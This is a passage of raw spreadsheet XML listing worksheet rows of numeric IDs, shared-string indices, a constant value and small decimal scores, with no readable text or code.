        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="31502" ht="15.75" customHeight="1">
      <c r="A31502" s="1">
        <v>14275.0</v>
      </c>
      <c r="B31502" s="2">
        <v>3.8441704E7</v>
      </c>
      <c r="C31502" s="2" t="s">
        <v>30296</v>
      </c>
      <c r="D31502" s="2">
        <v>1.0</v>
      </c>
      <c r="E31502" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31502" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="31503" ht="15.75" customHeight="1">
      <c r="A31503" s="1">
        <v>15098.0</v>
      </c>
      <c r="B31503" s="2">
        <v>4.1795112E7</v>
      </c>
      <c r="C31503" s="2" t="s">
        <v>30297</v>
      </c>
      <c r="D31503" s="2">
        <v>1.0</v>
      </c>
      <c r="E31503" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31503" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="31504" ht="15.75" customHeight="1">
      <c r="A31504" s="1">
        <v>15280.0</v>
      </c>
      <c r="B31504" s="2">
        <v>4.2400766E7</v>
      </c>
      <c r="C31504" s="2" t="s">
        <v>30298</v>
      </c>
      <c r="D31504" s="2">
        <v>1.0</v>
      </c>
      <c r="E31504" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31504" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="31505" ht="15.75" customHeight="1">
      <c r="A31505" s="1">
        <v>21760.0</v>
      </c>
      <c r="B31505" s="2">
        <v>2.6115998E7</v>
      </c>
      <c r="C31505" s="2" t="s">
        <v>30299</v>
      </c>
      <c r="D31505" s="2">
        <v>1.0</v>
      </c>
      <c r="E31505" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31505" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="31506" ht="15.75" customHeight="1">
      <c r="A31506" s="1">
        <v>27852.0</v>
      </c>
      <c r="B31506" s="2">
        <v>2.342753E7</v>
      </c>
      <c r="C31506" s="2" t="s">
        <v>30300</v>
      </c>
      <c r="D31506" s="2">
        <v>1.0</v>
      </c>
      <c r="E31506" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31506" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="31507" ht="15.75" customHeight="1">
      <c r="A31507" s="1">
        <v>1934.0</v>
      </c>
      <c r="B31507" s="2">
        <v>3.018677E7</v>
      </c>
      <c r="C31507" s="2" t="s">
        <v>30301</v>
      </c>
      <c r="D31507" s="2">
        <v>1.0</v>
      </c>
      <c r="E31507" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31507" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="31508" ht="15.75" customHeight="1">
      <c r="A31508" s="1">
        <v>3988.0</v>
      </c>
      <c r="B31508" s="2">
        <v>4.0854371E7</v>
      </c>
      <c r="C31508" s="2" t="s">
        <v>30302</v>
      </c>
      <c r="D31508" s="2">
        <v>1.0</v>
      </c>
      <c r="E31508" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31508" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="31509" ht="15.75" customHeight="1">
      <c r="A31509" s="1">
        <v>18900.0</v>
      </c>
      <c r="B31509" s="2">
        <v>5.4163953E7</v>
      </c>
      <c r="C31509" s="2" t="s">
        <v>30303</v>
      </c>
      <c r="D31509" s="2">
        <v>1.0</v>
      </c>
      <c r="E31509" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31509" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="31510" ht="15.75" customHeight="1">
      <c r="A31510" s="1">
        <v>24225.0</v>
      </c>
      <c r="B31510" s="2">
        <v>1.0435516E7</v>
      </c>
      <c r="C31510" s="2" t="s">
        <v>30304</v>
      </c>
      <c r="D31510" s="2">
        <v>1.0</v>
      </c>
      <c r="E31510" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31510" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="31511" ht="15.75" customHeight="1">
      <c r="A31511" s="1">
        <v>5077.0</v>
      </c>
      <c r="B31511" s="2">
        <v>4.442974E7</v>
      </c>
      <c r="C31511" s="2" t="s">
        <v>30305</v>
      </c>
      <c r="D31511" s="2">
        <v>1.0</v>
      </c>
      <c r="E31511" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31511" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="31512" ht="15.75" customHeight="1">
      <c r="A31512" s="1">
        <v>5965.0</v>
      </c>
      <c r="B31512" s="2">
        <v>4.7329755E7</v>
      </c>
      <c r="C31512" s="2" t="s">
        <v>30306</v>
      </c>
      <c r="D31512" s="2">
        <v>1.0</v>
      </c>
      <c r="E31512" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31512" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="31513" ht="15.75" customHeight="1">
      <c r="A31513" s="1">
        <v>3629.0</v>
      </c>
      <c r="B31513" s="2">
        <v>3.9232634E7</v>
      </c>
      <c r="C31513" s="2" t="s">
        <v>30307</v>
      </c>
      <c r="D31513" s="2">
        <v>1.0</v>
      </c>
      <c r="E31513" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31513" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="31514" ht="15.75" customHeight="1">
      <c r="A31514" s="1">
        <v>7939.0</v>
      </c>
      <c r="B31514" s="2">
        <v>5.2617833E7</v>
      </c>
      <c r="C31514" s="2" t="s">
        <v>30308</v>
      </c>
      <c r="D31514" s="2">
        <v>1.0</v>
      </c>
      <c r="E31514" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31514" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="31515" ht="15.75" customHeight="1">
      <c r="A31515" s="1">
        <v>15475.0</v>
      </c>
      <c r="B31515" s="2">
        <v>4.3148361E7</v>
      </c>
      <c r="C31515" s="2" t="s">
        <v>30309</v>
      </c>
      <c r="D31515" s="2">
        <v>1.0</v>
      </c>
      <c r="E31515" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31515" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="31516" ht="15.75" customHeight="1">
      <c r="A31516" s="1">
        <v>15825.0</v>
      </c>
      <c r="B31516" s="2">
        <v>4.4309795E7</v>
      </c>
      <c r="C31516" s="2" t="s">
        <v>30310</v>
      </c>
      <c r="D31516" s="2">
        <v>1.0</v>
      </c>
      <c r="E31516" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31516" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="31517" ht="15.75" customHeight="1">
      <c r="A31517" s="1">
        <v>15972.0</v>
      </c>
      <c r="B31517" s="2">
        <v>4.4845629E7</v>
      </c>
      <c r="C31517" s="2" t="s">
        <v>30311</v>
      </c>
      <c r="D31517" s="2">
        <v>1.0</v>
      </c>
      <c r="E31517" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31517" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="31518" ht="15.75" customHeight="1">
      <c r="A31518" s="1">
        <v>16507.0</v>
      </c>
      <c r="B31518" s="2">
        <v>4.6611548E7</v>
      </c>
      <c r="C31518" s="2" t="s">
        <v>29368</v>
      </c>
      <c r="D31518" s="2">
        <v>1.0</v>
      </c>
      <c r="E31518" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31518" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="31519" ht="15.75" customHeight="1">
      <c r="A31519" s="1">
        <v>16734.0</v>
      </c>
      <c r="B31519" s="2">
        <v>4.751843E7</v>
      </c>
      <c r="C31519" s="2" t="s">
        <v>30312</v>
      </c>
      <c r="D31519" s="2">
        <v>1.0</v>
      </c>
      <c r="E31519" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31519" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="31520" ht="15.75" customHeight="1">
      <c r="A31520" s="1">
        <v>30152.0</v>
      </c>
      <c r="B31520" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C31520" s="2" t="s">
        <v>30313</v>
      </c>
      <c r="D31520" s="2">
        <v>1.0</v>
      </c>
      <c r="E31520" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31520" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="31521" ht="15.75" customHeight="1">
      <c r="A31521" s="1">
        <v>10973.0</v>
      </c>
      <c r="B31521" s="2">
        <v>1.7336646E7</v>
      </c>
      <c r="C31521" s="2" t="s">
        <v>30314</v>
      </c>
      <c r="D31521" s="2">
        <v>1.0</v>
      </c>
      <c r="E31521" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31521" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="31522" ht="15.75" customHeight="1">
      <c r="A31522" s="1">
        <v>15487.0</v>
      </c>
      <c r="B31522" s="2">
        <v>4.3186197E7</v>
      </c>
      <c r="C31522" s="2" t="s">
        <v>30315</v>
      </c>
      <c r="D31522" s="2">
        <v>1.0</v>
      </c>
      <c r="E31522" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31522" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="31523" ht="15.75" customHeight="1">
      <c r="A31523" s="1">
        <v>20324.0</v>
      </c>
      <c r="B31523" s="2">
        <v>1.1483415E7</v>
      </c>
      <c r="C31523" s="2" t="s">
        <v>30316</v>
      </c>
      <c r="D31523" s="2">
        <v>1.0</v>
      </c>
      <c r="E31523" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31523" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="31524" ht="15.75" customHeight="1">
      <c r="A31524" s="1">
        <v>25481.0</v>
      </c>
      <c r="B31524" s="2">
        <v>1.4028153E7</v>
      </c>
      <c r="C31524" s="2" t="s">
        <v>30317</v>
      </c>
      <c r="D31524" s="2">
        <v>1.0</v>
      </c>
      <c r="E31524" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31524" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="31525" ht="15.75" customHeight="1">
      <c r="A31525" s="1">
        <v>26221.0</v>
      </c>
      <c r="B31525" s="2">
        <v>1.6262409E7</v>
      </c>
      <c r="C31525" s="2" t="s">
        <v>30318</v>
      </c>
      <c r="D31525" s="2">
        <v>1.0</v>
      </c>
      <c r="E31525" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31525" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="31526" ht="15.75" customHeight="1">
      <c r="A31526" s="1">
        <v>29968.0</v>
      </c>
      <c r="B31526" s="2">
        <v>3608961.0</v>
      </c>
      <c r="C31526" s="2" t="s">
        <v>30319</v>
      </c>
      <c r="D31526" s="2">
        <v>1.0</v>
      </c>
      <c r="E31526" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31526" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="31527" ht="15.75" customHeight="1">
      <c r="A31527" s="1">
        <v>10162.0</v>
      </c>
      <c r="B31527" s="2">
        <v>5.7335329E7</v>
      </c>
      <c r="C31527" s="2" t="s">
        <v>30320</v>
      </c>
      <c r="D31527" s="2">
        <v>1.0</v>
      </c>
      <c r="E31527" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31527" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="31528" ht="15.75" customHeight="1">
      <c r="A31528" s="1">
        <v>13864.0</v>
      </c>
      <c r="B31528" s="2">
        <v>3.6945432E7</v>
      </c>
      <c r="C31528" s="2" t="s">
        <v>30321</v>
      </c>
      <c r="D31528" s="2">
        <v>1.0</v>
      </c>
      <c r="E31528" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31528" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="31529" ht="15.75" customHeight="1">
      <c r="A31529" s="1">
        <v>6942.0</v>
      </c>
      <c r="B31529" s="2">
        <v>4.9924088E7</v>
      </c>
      <c r="C31529" s="2" t="s">
        <v>30322</v>
      </c>
      <c r="D31529" s="2">
        <v>1.0</v>
      </c>
      <c r="E31529" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31529" s="2">
        <v>0.1069651741293533</v>
      </c>
    </row>
    <row r="31530" ht="15.75" customHeight="1">
      <c r="A31530" s="1">
        <v>8775.0</v>
      </c>
      <c r="B31530" s="2">
        <v>5.458593E7</v>
      </c>
      <c r="C31530" s="2" t="s">
        <v>30323</v>
      </c>
      <c r="D31530" s="2">
        <v>1.0</v>
      </c>
      <c r="E31530" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31530" s="2">
        <v>0.1067019400352734</v>
      </c>
    </row>
    <row r="31531" ht="15.75" customHeight="1">
      <c r="A31531" s="1">
        <v>18129.0</v>
      </c>
      <c r="B31531" s="2">
        <v>5.1801693E7</v>
      </c>
      <c r="C31531" s="2" t="s">
        <v>30324</v>
      </c>
      <c r="D31531" s="2">
        <v>1.0</v>
      </c>
      <c r="E31531" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31531" s="2">
        <v>0.1066308243727598</v>
      </c>
    </row>
    <row r="31532" ht="15.75" customHeight="1">
      <c r="A31532" s="1">
        <v>19357.0</v>
      </c>
      <c r="B31532" s="2">
        <v>5.5419609E7</v>
      </c>
      <c r="C31532" s="2" t="s">
        <v>30325</v>
      </c>
      <c r="D31532" s="2">
        <v>1.0</v>
      </c>
      <c r="E31532" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31532" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="31533" ht="15.75" customHeight="1">
      <c r="A31533" s="1">
        <v>31750.0</v>
      </c>
      <c r="B31533" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C31533" s="2" t="s">
        <v>30326</v>
      </c>
      <c r="D31533" s="2">
        <v>1.0</v>
      </c>
      <c r="E31533" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31533" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="31534" ht="15.75" customHeight="1">
      <c r="A31534" s="1">
        <v>6289.0</v>
      </c>
      <c r="B31534" s="2">
        <v>4.8187121E7</v>
      </c>
      <c r="C31534" s="2" t="s">
        <v>30327</v>
      </c>
      <c r="D31534" s="2">
        <v>1.0</v>
      </c>
      <c r="E31534" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31534" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="31535" ht="15.75" customHeight="1">
      <c r="A31535" s="1">
        <v>14186.0</v>
      </c>
      <c r="B31535" s="2">
        <v>3.8136692E7</v>
      </c>
      <c r="C31535" s="2" t="s">
        <v>30328</v>
      </c>
      <c r="D31535" s="2">
        <v>1.0</v>
      </c>
      <c r="E31535" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31535" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="31536" ht="15.75" customHeight="1">
      <c r="A31536" s="1">
        <v>21827.0</v>
      </c>
      <c r="B31536" s="2">
        <v>2.6981281E7</v>
      </c>
      <c r="C31536" s="2" t="s">
        <v>30329</v>
      </c>
      <c r="D31536" s="2">
        <v>1.0</v>
      </c>
      <c r="E31536" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31536" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="31537" ht="15.75" customHeight="1">
      <c r="A31537" s="1">
        <v>34146.0</v>
      </c>
      <c r="B31537" s="2">
        <v>9849727.0</v>
      </c>
      <c r="C31537" s="2" t="s">
        <v>30330</v>
      </c>
      <c r="D31537" s="2">
        <v>1.0</v>
      </c>
      <c r="E31537" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31537" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="31538" ht="15.75" customHeight="1">
      <c r="A31538" s="1">
        <v>2010.0</v>
      </c>
      <c r="B31538" s="2">
        <v>3.0676188E7</v>
      </c>
      <c r="C31538" s="2" t="s">
        <v>30331</v>
      </c>
      <c r="D31538" s="2">
        <v>1.0</v>
      </c>
      <c r="E31538" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31538" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31539" ht="15.75" customHeight="1">
      <c r="A31539" s="1">
        <v>2282.0</v>
      </c>
      <c r="B31539" s="2">
        <v>3.2549944E7</v>
      </c>
      <c r="C31539" s="2" t="s">
        <v>30332</v>
      </c>
      <c r="D31539" s="2">
        <v>1.0</v>
      </c>
      <c r="E31539" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31539" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31540" ht="15.75" customHeight="1">
      <c r="A31540" s="1">
        <v>2302.0</v>
      </c>
      <c r="B31540" s="2">
        <v>3.2724081E7</v>
      </c>
      <c r="C31540" s="2" t="s">
        <v>30333</v>
      </c>
      <c r="D31540" s="2">
        <v>1.0</v>
      </c>
      <c r="E31540" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31540" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31541" ht="15.75" customHeight="1">
      <c r="A31541" s="1">
        <v>2335.0</v>
      </c>
      <c r="B31541" s="2">
        <v>3.2960854E7</v>
      </c>
      <c r="C31541" s="2" t="s">
        <v>30334</v>
      </c>
      <c r="D31541" s="2">
        <v>1.0</v>
      </c>
      <c r="E31541" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31541" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31542" ht="15.75" customHeight="1">
      <c r="A31542" s="1">
        <v>2545.0</v>
      </c>
      <c r="B31542" s="2">
        <v>3.4121058E7</v>
      </c>
      <c r="C31542" s="2" t="s">
        <v>30335</v>
      </c>
      <c r="D31542" s="2">
        <v>1.0</v>
      </c>
      <c r="E31542" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31542" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31543" ht="15.75" customHeight="1">
      <c r="A31543" s="1">
        <v>4602.0</v>
      </c>
      <c r="B31543" s="2">
        <v>4.2832269E7</v>
      </c>
      <c r="C31543" s="2" t="s">
        <v>30336</v>
      </c>
      <c r="D31543" s="2">
        <v>1.0</v>
      </c>
      <c r="E31543" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31543" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31544" ht="15.75" customHeight="1">
      <c r="A31544" s="1">
        <v>5095.0</v>
      </c>
      <c r="B31544" s="2">
        <v>4.4500395E7</v>
      </c>
      <c r="C31544" s="2" t="s">
        <v>30337</v>
      </c>
      <c r="D31544" s="2">
        <v>1.0</v>
      </c>
      <c r="E31544" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31544" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31545" ht="15.75" customHeight="1">
      <c r="A31545" s="1">
        <v>6080.0</v>
      </c>
      <c r="B31545" s="2">
        <v>4.7670073E7</v>
      </c>
      <c r="C31545" s="2" t="s">
        <v>30338</v>
      </c>
      <c r="D31545" s="2">
        <v>1.0</v>
      </c>
      <c r="E31545" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31545" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31546" ht="15.75" customHeight="1">
      <c r="A31546" s="1">
        <v>6202.0</v>
      </c>
      <c r="B31546" s="2">
        <v>4.7965552E7</v>
      </c>
      <c r="C31546" s="2" t="s">
        <v>30339</v>
      </c>
      <c r="D31546" s="2">
        <v>1.0</v>
      </c>
      <c r="E31546" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31546" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31547" ht="15.75" customHeight="1">
      <c r="A31547" s="1">
        <v>7601.0</v>
      </c>
      <c r="B31547" s="2">
        <v>5.1642973E7</v>
      </c>
      <c r="C31547" s="2" t="s">
        <v>30340</v>
      </c>
      <c r="D31547" s="2">
        <v>1.0</v>
      </c>
      <c r="E31547" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31547" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31548" ht="15.75" customHeight="1">
      <c r="A31548" s="1">
        <v>8131.0</v>
      </c>
      <c r="B31548" s="2">
        <v>5.3107846E7</v>
      </c>
      <c r="C31548" s="2" t="s">
        <v>30341</v>
      </c>
      <c r="D31548" s="2">
        <v>1.0</v>
      </c>
      <c r="E31548" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31548" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31549" ht="15.75" customHeight="1">
      <c r="A31549" s="1">
        <v>8458.0</v>
      </c>
      <c r="B31549" s="2">
        <v>5.3996561E7</v>
      </c>
      <c r="C31549" s="2" t="s">
        <v>30342</v>
      </c>
      <c r="D31549" s="2">
        <v>1.0</v>
      </c>
      <c r="E31549" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31549" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31550" ht="15.75" customHeight="1">
      <c r="A31550" s="1">
        <v>9064.0</v>
      </c>
      <c r="B31550" s="2">
        <v>5.511948E7</v>
      </c>
      <c r="C31550" s="2" t="s">
        <v>30343</v>
      </c>
      <c r="D31550" s="2">
        <v>1.0</v>
      </c>
      <c r="E31550" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31550" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31551" ht="15.75" customHeight="1">
      <c r="A31551" s="1">
        <v>9346.0</v>
      </c>
      <c r="B31551" s="2">
        <v>5.5660069E7</v>
      </c>
      <c r="C31551" s="2" t="s">
        <v>30344</v>
      </c>
      <c r="D31551" s="2">
        <v>1.0</v>
      </c>
      <c r="E31551" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31551" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31552" ht="15.75" customHeight="1">
      <c r="A31552" s="1">
        <v>10834.0</v>
      </c>
      <c r="B31552" s="2">
        <v>1.5992104E7</v>
      </c>
      <c r="C31552" s="2" t="s">
        <v>30345</v>
      </c>
      <c r="D31552" s="2">
        <v>1.0</v>
      </c>
      <c r="E31552" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31552" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31553" ht="15.75" customHeight="1">
      <c r="A31553" s="1">
        <v>11097.0</v>
      </c>
      <c r="B31553" s="2">
        <v>1.8538934E7</v>
      </c>
      <c r="C31553" s="2" t="s">
        <v>30346</v>
      </c>
      <c r="D31553" s="2">
        <v>1.0</v>
      </c>
      <c r="E31553" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31553" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31554" ht="15.75" customHeight="1">
      <c r="A31554" s="1">
        <v>11436.0</v>
      </c>
      <c r="B31554" s="2">
        <v>2.1765338E7</v>
      </c>
      <c r="C31554" s="2" t="s">
        <v>30347</v>
      </c>
      <c r="D31554" s="2">
        <v>1.0</v>
      </c>
      <c r="E31554" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31554" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31555" ht="15.75" customHeight="1">
      <c r="A31555" s="1">
        <v>12740.0</v>
      </c>
      <c r="B31555" s="2">
        <v>3.1057894E7</v>
      </c>
      <c r="C31555" s="2" t="s">
        <v>30348</v>
      </c>
      <c r="D31555" s="2">
        <v>1.0</v>
      </c>
      <c r="E31555" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31555" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31556" ht="15.75" customHeight="1">
      <c r="A31556" s="1">
        <v>12955.0</v>
      </c>
      <c r="B31556" s="2">
        <v>3.243189E7</v>
      </c>
      <c r="C31556" s="2" t="s">
        <v>30349</v>
      </c>
      <c r="D31556" s="2">
        <v>1.0</v>
      </c>
      <c r="E31556" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31556" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31557" ht="15.75" customHeight="1">
      <c r="A31557" s="1">
        <v>13004.0</v>
      </c>
      <c r="B31557" s="2">
        <v>3.2813116E7</v>
      </c>
      <c r="C31557" s="2" t="s">
        <v>30333</v>
      </c>
      <c r="D31557" s="2">
        <v>1.0</v>
      </c>
      <c r="E31557" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31557" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31558" ht="15.75" customHeight="1">
      <c r="A31558" s="1">
        <v>13078.0</v>
      </c>
      <c r="B31558" s="2">
        <v>3.3358209E7</v>
      </c>
      <c r="C31558" s="2" t="s">
        <v>30350</v>
      </c>
      <c r="D31558" s="2">
        <v>1.0</v>
      </c>
      <c r="E31558" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31558" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31559" ht="15.75" customHeight="1">
      <c r="A31559" s="1">
        <v>13618.0</v>
      </c>
      <c r="B31559" s="2">
        <v>3.5857178E7</v>
      </c>
      <c r="C31559" s="2" t="s">
        <v>30351</v>
      </c>
      <c r="D31559" s="2">
        <v>1.0</v>
      </c>
      <c r="E31559" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31559" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31560" ht="15.75" customHeight="1">
      <c r="A31560" s="1">
        <v>14782.0</v>
      </c>
      <c r="B31560" s="2">
        <v>4.09106E7</v>
      </c>
      <c r="C31560" s="2" t="s">
        <v>30352</v>
      </c>
      <c r="D31560" s="2">
        <v>1.0</v>
      </c>
      <c r="E31560" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31560" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31561" ht="15.75" customHeight="1">
      <c r="A31561" s="1">
        <v>15099.0</v>
      </c>
      <c r="B31561" s="2">
        <v>4.1795301E7</v>
      </c>
      <c r="C31561" s="2" t="s">
        <v>30353</v>
      </c>
      <c r="D31561" s="2">
        <v>1.0</v>
      </c>
      <c r="E31561" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31561" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31562" ht="15.75" customHeight="1">
      <c r="A31562" s="1">
        <v>15354.0</v>
      </c>
      <c r="B31562" s="2">
        <v>4.268271E7</v>
      </c>
      <c r="C31562" s="2" t="s">
        <v>30354</v>
      </c>
      <c r="D31562" s="2">
        <v>1.0</v>
      </c>
      <c r="E31562" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31562" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31563" ht="15.75" customHeight="1">
      <c r="A31563" s="1">
        <v>15657.0</v>
      </c>
      <c r="B31563" s="2">
        <v>4.3668972E7</v>
      </c>
      <c r="C31563" s="2" t="s">
        <v>30355</v>
      </c>
      <c r="D31563" s="2">
        <v>1.0</v>
      </c>
      <c r="E31563" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31563" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31564" ht="15.75" customHeight="1">
      <c r="A31564" s="1">
        <v>15925.0</v>
      </c>
      <c r="B31564" s="2">
        <v>4.4696906E7</v>
      </c>
      <c r="C31564" s="2" t="s">
        <v>30356</v>
      </c>
      <c r="D31564" s="2">
        <v>1.0</v>
      </c>
      <c r="E31564" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31564" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31565" ht="15.75" customHeight="1">
      <c r="A31565" s="1">
        <v>16653.0</v>
      </c>
      <c r="B31565" s="2">
        <v>4719527.0</v>
      </c>
      <c r="C31565" s="2" t="s">
        <v>30357</v>
      </c>
      <c r="D31565" s="2">
        <v>1.0</v>
      </c>
      <c r="E31565" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31565" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31566" ht="15.75" customHeight="1">
      <c r="A31566" s="1">
        <v>17500.0</v>
      </c>
      <c r="B31566" s="2">
        <v>5.000547E7</v>
      </c>
      <c r="C31566" s="2" t="s">
        <v>30358</v>
      </c>
      <c r="D31566" s="2">
        <v>1.0</v>
      </c>
      <c r="E31566" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31566" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31567" ht="15.75" customHeight="1">
      <c r="A31567" s="1">
        <v>17602.0</v>
      </c>
      <c r="B31567" s="2">
        <v>5.0354654E7</v>
      </c>
      <c r="C31567" s="2" t="s">
        <v>30359</v>
      </c>
      <c r="D31567" s="2">
        <v>1.0</v>
      </c>
      <c r="E31567" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31567" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="31568" ht="15.75" customHeight="1">
      <c r="A31568" s="1">
        <v>17786.0</v>
      </c>
      <c r="B31568" s="2">
        <v>5.0789862E7</v>
      </c>
      <c r="C31568" s="2" t="s">
        <v>30360</v>
      </c>
      <c r="D31568" s="2">
        <v>1.0</v>
      </c>
      <c r="E31568" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31568" s="2">
